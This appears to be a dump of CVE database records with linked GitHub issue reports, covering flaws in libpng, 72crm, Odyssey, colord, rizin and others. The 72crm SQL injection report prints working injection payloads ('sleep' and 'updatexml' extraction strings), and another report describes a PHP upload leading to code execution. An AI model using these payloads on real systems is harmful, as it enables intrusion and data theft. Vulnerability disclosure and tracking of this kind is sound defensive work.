"versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/fabric8io/kubernetes-client/issues/3653
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fabric8io", "kubernetes-client" ]
### Describe the bug Hi team, I think I found a security issue in the kubernetes-client library which can cause code execution depending on where the input is coming from. If a malicious config string or Kubernetes resource string is passed to a specific function in the library, this will execute arbitrary Java code on the machine which parses the resources. I didn't found a proper way to report this instead of creating a GitHub issue. Should I add more details to this public issue or is there a way to report this privately? Thanks in advance for your response. Regards, Jordy ### Fabric8 Kubernetes Client version 5.10.1@latest ### Steps to reproduce N/A ### Expected behavior N/A ### Runtime Kubernetes (vanilla) ### Kubernetes API Server version 1.22.3@latest ### Environment Windows, Linux, macOS ### Fabric8 Kubernetes Client Logs _No response_ ### Additional context _No response_
Security issue in kubernetes-client
https://api.github.com/repos/fabric8io/kubernetes-client/issues/3653/comments
5
2021-12-16T15:03:31Z
2022-03-03T09:28:59Z
https://github.com/fabric8io/kubernetes-client/issues/3653
1,082,300,494
3,653
4,035
CVE-2021-4214
2022-08-24T16:15:10.037
A heap overflow flaw was found in libpngs' pngimage.c program. This flaw allows an attacker with local network access to pass a specially crafted PNG file to the pngimage utility, causing an application to crash, leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-4214" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2043393" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/glennrp/libpng/issues/302" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2021-4214" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221020-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-4214" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2043393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/glennrp/libpng/issues/302" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2021-4214" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221020-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libpng:libpng:1.6.0:-:*:*:*:*:*:*", "matchCriteriaId": "42882881-6827-4123-B217-FC9B4C36702A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*", "matchCriteriaId": "E7CF3019-975D-40BB-A8A4-894E62BD3797", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/glennrp/libpng/issues/302
[ "Exploit", "Third Party Advisory" ]
github.com
[ "glennrp", "libpng" ]
Hi, I find a potential heap overflow issue in contrib/libtests/pngimage.c, function compare_read. The code version is commit https://github.com/glennrp/libpng/commit/301f7a14295a3bdfaf406dbb5004d0784dc137ea The compile command is `CFLAGS="-O0 -g -fsanitize=address,leak,undefined" ./configure --disable-shared` The reproduce command `./pngimage input` Trace reported by ASAN: `==18068==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000cc00 at pc 0x000000416f54 bp 0x7fffffffd0d0 sp 0x7fffffffd0c0 #0 0x416f53 in compare_read contrib/libtests/pngimage.c:1240 #1 0x4249e6 in test_one_file contrib/libtests/pngimage.c:1484 #2 0x4249e6 in do_test contrib/libtests/pngimage.c:1564 #3 0x405da3 in main contrib/libtests/pngimage.c:1668 #4 0x7ffff589082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x407f48 in _start (/mnt/data/playground/libpng-libpng16-a/pngimage+0x407f48) 0x60200000cc00 is located 0 bytes to the right of 16-byte region [0x60200000cbf0,0x60200000cc00) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x50f877 in png_malloc_base /mnt/data/playground/libpng-libpng16-a/pngmem.c:95 #2 0x50f877 in png_malloc /mnt/data/playground/libpng-libpng16-a/pngmem.c:179 SUMMARY: AddressSanitizer: heap-buffer-overflow contrib/libtests/pngimage.c:1240 compare_read Shadow bytes around the buggy address: 0x0c047fff9930: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9940: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9950: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9960: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9970: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff9980:[fa]fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9990: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff99a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff99b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff99c0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff99d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==18068==ABORTING ` The reason for this overflow is that the buffer of orig and row might not have bpp length of data so that the index is out of bound in the later loop. ![image](https://user-images.githubusercontent.com/7632714/60677294-b258a800-9eb3-11e9-8cfb-4dcede05278b.png) ![image](https://user-images.githubusercontent.com/7632714/60677376-ecc24500-9eb3-11e9-810f-cc256fbe0709.png) ![image](https://user-images.githubusercontent.com/7632714/60108548-55fed580-979b-11e9-8bd0-4331a0038510.png) According to the gdb results, bpp is 2 and the length of the buffer is only 1. The attachment is the input file. [input.zip](https://github.com/glennrp/libpng/files/3325829/input.zip)
A potential heap overflow issue
https://api.github.com/repos/pnggroup/libpng/issues/302/comments
3
2019-06-25T14:50:55Z
2022-01-26T06:39:19Z
https://github.com/pnggroup/libpng/issues/302
460,472,662
302
4,036
CVE-2022-37178
2022-08-24T17:15:08.290
An issue was discovered in 72crm 9.0. There is a SQL Injection vulnerability in View the task calendar.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:72crm:wukong_crm:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD0E887-2558-4A21-B67E-D5E2B722ABEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/72wukong/72crm-9.0-PHP/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "72wukong", "72crm-9.0-PHP" ]
## **Brief of this vulnerability** 72crm v9 has sql injection vulnerability in View the task calendar ## **Test Environment** - Windows10 - PHP 5.6.9+Apache/2.4.39 ## **Affect version** 72crm v9 ## **Vulnerable Code** application\work\controller\Task.php line 506 The $param parameter is passed to getDateList ![image](https://user-images.githubusercontent.com/78201553/181420434-298e5c75-48ff-436e-bd6e-fbe643f44c34.png) The start_time parameter and stop_time parameter are directly spliced ​​into $whereDate, and then executed on line 493. resulting in sql injection vulnerability ![image](https://user-images.githubusercontent.com/78201553/181420526-f8e67ebc-4d19-4382-94a2-d4cc29744338.png) ## **Vulnerability display** First enter the background Click as shown,go to the View the task calendar and capture the packet ![image](https://user-images.githubusercontent.com/78201553/181420769-5b16ca13-1929-413d-88a1-f487657589df.png) ![image](https://user-images.githubusercontent.com/78201553/181420897-8e43b29b-25dc-4117-8b49-f66dd14dd478.png) payload: start_time=1&stop_time=1))+or+sleep(2)--+ Sleep successfully for 2 seconds ![image](https://user-images.githubusercontent.com/78201553/181420967-89d76ecf-7b67-4743-b642-d7dbca2e8ce5.png) If debug mode is enabled ![image](https://user-images.githubusercontent.com/78201553/181421095-b6bea841-a09a-46e9-8879-9cb2bf20b85f.png) payload:start_time=1&stop_time=1))+or+updatexml(1,concat(0x7e,database(),0x7e,version()),1)--+ ![image](https://user-images.githubusercontent.com/78201553/181421211-2d8f4a72-6fa2-4c4f-bb12-bded5a76aa5f.png) Successfully obtained the database name and version number
72crm v9 has sql injection vulnerability
https://api.github.com/repos/WuKongOpenSource/WukongCRM-9.0-PHP/issues/34/comments
0
2022-07-28T04:35:24Z
2022-07-28T04:35:24Z
https://github.com/WuKongOpenSource/WukongCRM-9.0-PHP/issues/34
1,320,380,250
34
4,037
CVE-2022-37181
2022-08-24T17:15:08.343
72crm 9.0 has an Arbitrary file upload vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:72crm:wukong_crm:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD0E887-2558-4A21-B67E-D5E2B722ABEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/72wukong/72crm-9.0-PHP/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "72wukong", "72crm-9.0-PHP" ]
## **Brief of this vulnerability** 72crm v9 has Arbitrary file upload vulnerability Where to upload the logo ## **Test Environment** - Windows10 - PHP 5.6.9+Apache/2.4.39 ## **Affect version** 72crm v9 ## **Vulnerable Code** application\admin\controller\System.php line 51 ![image](https://user-images.githubusercontent.com/78201553/181876969-a48870a6-b2b6-4393-a078-510eeee9c008.png) After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file ![image](https://user-images.githubusercontent.com/78201553/181876982-b8aa8629-1527-41db-a719-b98995e33a1c.png) follow-up move function(set filename) line 352: ![image](https://user-images.githubusercontent.com/78201553/181877071-c8f616a9-63c1-4c88-afb4-4c79bbbc1b9d.png) follow up function Generate time-based file names with php as a suffix ![image](https://user-images.githubusercontent.com/78201553/181877151-f3743d4d-e32a-4411-9bf6-efea449654d4.png) then move_uploaded_file with this filename (thinkphp\library\think\File.php line 369) ![image](https://user-images.githubusercontent.com/78201553/181877194-e667e5be-ce4c-43ed-8fb3-b45799fccb54.png) ## **Vulnerability display** First enter the background Click as shown,go to the Enterprise management background ![image](https://user-images.githubusercontent.com/78201553/181877231-2fd62803-4c43-41fc-ab99-e410737608af.png) click this ![image](https://user-images.githubusercontent.com/78201553/181877272-e92bd5c1-ba80-4ac5-b4d6-61ea95027319.png) Just upload a picture and capture the package, modify the content as follows ![image](https://user-images.githubusercontent.com/78201553/181877304-9e4a7e7e-a9cc-47c0-92be-e6e5e27d3d3c.png) Back to enterprise management background ![image](https://user-images.githubusercontent.com/78201553/181877338-9a78482b-1d57-410b-84b7-f71b00c17991.png) access image address ![image](https://user-images.githubusercontent.com/78201553/181877353-147d3970-e815-4d38-b394-3a34261d3ec8.png) php code executed successfully Notice:Because it is uploaded at the logo, unauthorized users can also access this php code ![image](https://user-images.githubusercontent.com/78201553/181877427-22946d5a-8f81-4f25-ad58-0b8cb404a45f.png) ![image](https://user-images.githubusercontent.com/78201553/181877435-9e90a027-aa0a-4d80-84e8-5bf38aa98e60.png)
72crm v9 has Arbitrary file upload vulnerability
https://api.github.com/repos/WuKongOpenSource/WukongCRM-9.0-PHP/issues/35/comments
0
2022-07-30T06:18:30Z
2022-07-30T06:18:30Z
https://github.com/WuKongOpenSource/WukongCRM-9.0-PHP/issues/35
1,322,913,749
35
4,038
CVE-2022-37158
2022-08-25T17:15:08.150
RuoYi v3.8.3 has a Weak password vulnerability in the management system.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/YunaiV/ruoyi-vue-pro/issues/170" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/YunaiV/ruoyi-vue-pro/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:iocoder:ruoyi-vue-pro:3.8.3:*:*:*:*:*:*:*", "matchCriteriaId": "5A0B2F76-205F-4F61-A7E9-9FB7177F40C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "521" ]
521
https://github.com/YunaiV/ruoyi-vue-pro/issues/170
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "YunaiV", "ruoyi-vue-pro" ]
碰到问题,请在 <https://github.com/YunaiV/ruoyi-vue-pro/issues> 搜索是否存在相似的 issue。 不按照模板提交的 issue,会被系统自动删除。 ### 基本信息 - ruoyi-vue-pro 版本:RuoYi v3.8.3 - 操作系统:windows - 数据库:mysql5.6 ### 你猜测可能的原因 (必填)我花费了 2-4 小时自查,发现可能的原因是:Weak password vulnerability in the management system ### 复现步骤 ![image](https://user-images.githubusercontent.com/85209555/181746516-f6f0c728-1e53-4629-9d4c-387884a22961.png) ### 报错信息 带上必要的截图
Weak password vulnerability in the management system
https://api.github.com/repos/YunaiV/ruoyi-vue-pro/issues/170/comments
1
2022-07-29T11:06:37Z
2022-08-19T16:56:07Z
https://github.com/YunaiV/ruoyi-vue-pro/issues/170
1,322,110,038
170
4,039
CVE-2021-42523
2022-08-25T18:15:09.260
There are two Information Disclosure vulnerabilities in colord, and they lie in colord/src/cd-device-db.c and colord/src/cd-profile-db.c separately. They exist because the 'err_msg' of 'sqlite3_exec' is not releasing after use, while libxml2 emphasizes that the caller needs to release it.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/hughsie/colord/issues/110" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/hughsie/colord/issues/110" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:colord_project:colord:1.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "3E226351-6F3B-47C1-9E4A-72398A194CA5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:colord_project:colord:1.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "5F0E84AE-F68D-4AE7-B284-3D0A1B1BF175", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/hughsie/colord/issues/110
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "hughsie", "colord" ]
According to libsqlite3 API document, "To avoid memory leaks, the application should invoke sqlite3_free() on error message strings returned through the 5th parameter of sqlite3_exec() after the error message string is no longer needed." https://github.com/hughsie/colord/blob/1572d92bb69de7632841bf17f3cb81534881c3c6/src/cd-device-db.c#L93-L103
potential memory leak: forgetting to free error message of libsqlite3 API 'sqlite3_exec' -1
https://api.github.com/repos/hughsie/colord/issues/110/comments
5
2020-03-21T15:10:44Z
2022-08-26T07:40:04Z
https://github.com/hughsie/colord/issues/110
585,517,804
110
4,040
CVE-2021-43766
2022-08-25T18:15:09.317
Odyssey passes to server unencrypted bytes from man-in-the-middle When Odyssey is configured to use certificate Common Name for client authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. This is similar to CVE-2021-23214 for PostgreSQL.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://github.com/yandex/odyssey/issues/376%2C" }, { "source": "patrick@puiterwijk.org", "tags": [ "Not Applicable" ], "url": "https://www.postgresql.org/support/security/CVE-2021-23214/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/yandex/odyssey/issues/376%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://www.postgresql.org/support/security/CVE-2021-23214/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odyssey_project:odyssey:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "34DBBE36-E704-416B-B8C1-CCF6D8F2B865", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/yandex/odyssey/issues/376%2C
null
github.com
[ "yandex", "odyssey" ]
When Odyssey is configured to use certificate Common Name for client authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. This is similar to CVE-2021-23214 for PostgreSQL. This issue was fixed in version 1.2 (PR #359)
CVE-2021-43766: Odyssey passes to server unencrypted bytes from man-in-the-middle
https://api.github.com/repos/yandex/odyssey/issues/376/comments
0
2021-12-06T06:42:53Z
2021-12-06T06:42:56Z
https://github.com/yandex/odyssey/issues/376
1,071,787,095
376
4,041
CVE-2021-43767
2022-08-25T18:15:09.377
Odyssey passes to client unencrypted bytes from man-in-the-middle When Odyssey storage is configured to use the PostgreSQL server using 'trust' authentication with a 'clientcert' requirement or to use 'cert' authentication, a man-in-the-middle attacker can inject false responses to the client's first few queries. Despite the use of SSL certificate verification and encryption, Odyssey will pass these results to client as if they originated from valid server. This is similar to CVE-2021-23222 for PostgreSQL.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://github.com/yandex/odyssey/issues/377%2C" }, { "source": "patrick@puiterwijk.org", "tags": [ "Not Applicable", "Vendor Advisory" ], "url": "https://www.postgresql.org/support/security/CVE-2021-23222/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/yandex/odyssey/issues/377%2C" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable", "Vendor Advisory" ], "url": "https://www.postgresql.org/support/security/CVE-2021-23222/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "matchCriteriaId": "2E950ED8-CA9E-4C53-BD86-7E1BEF561E9A", "versionEndExcluding": "9.6.24", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "matchCriteriaId": "C495B1CF-63CD-4E10-A9B2-6FD773AD5243", "versionEndExcluding": "10.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "matchCriteriaId": "121A1F97-8480-4C15-AAA6-256CB1C0DD47", "versionEndExcluding": "11.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E585815-7CA4-4B66-B222-28064F4600C7", "versionEndExcluding": "12.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:postgresql:postgresql:*:*:*:*:*:*:*:*", "matchCriteriaId": "D4F8E475-7A26-4157-8E42-91D37845436C", "versionEndExcluding": "13.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:postgresql:postgresql:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "B7DAB70A-574C-45E0-BC26-0C980E58907B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/yandex/odyssey/issues/377%2C
null
github.com
[ "yandex", "odyssey" ]
When Odyssey storage is configured to use the PostgreSQL server using `trust` authentication with a `clientcert` requirement or to use `cert` authentication, a man-in-the-middle attacker can inject false responses to the client's first few queries. Despite the use of SSL certificate verification and encryption, Odyssey will pass these results to clients as if they originated from a valid server. This is similar to CVE-2021-23222 for PostgreSQL. This issue was fixed in version 1.2 (PR #359)
CVE-2021-43767: Odyssey passes to client unencrypted bytes from man-in-the-middle
https://api.github.com/repos/yandex/odyssey/issues/377/comments
0
2021-12-06T06:43:37Z
2021-12-06T06:43:40Z
https://github.com/yandex/odyssey/issues/377
1,071,787,462
377
4,042
CVE-2021-4022
2022-08-25T18:15:09.443
A vulnerability was found in rizin. The bug involves an ELF64 binary for the HPPA architecture. When a specially crafted binarygets analysed by rizin, it causes rizin to crash by freeing an uninitialized (and potentially user controlled, depending on the build) memory address.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2015" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2015" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDF54820-3CA2-49DC-9B65-DF480E8AF596", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/rizinorg/rizin/issues/2015
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
